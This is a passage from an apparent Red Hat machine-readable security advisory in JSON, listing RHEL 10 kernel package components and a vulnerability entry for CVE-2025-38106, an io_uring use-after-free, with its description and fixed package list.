"product_id": "RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "libperf-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "perf-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "perf-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "perf-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "rtla-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "rv-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "rv-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "rv-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-38106",
"cwe": {
"id": "CWE-911",
"name": "Improper Update of Reference Count"
},
"discovery_date": "2025-07-03T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2376077"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Linux kernel\u0027s io_uring subsystem. A local attacker with low privileges could exploit a use-after-free vulnerability when the `sq-\u003ethread` object is prematurely released while still being accessed by the `__io_uring_show_fdinfo()` function. This flaw could lead to privilege escalation, allowing the attacker to execute arbitrary code, disclose sensitive information, or cause a system-wide denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: Linux kernel io_uring: Local privilege escalation, information disclosure, or denial of service via use-after-free",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
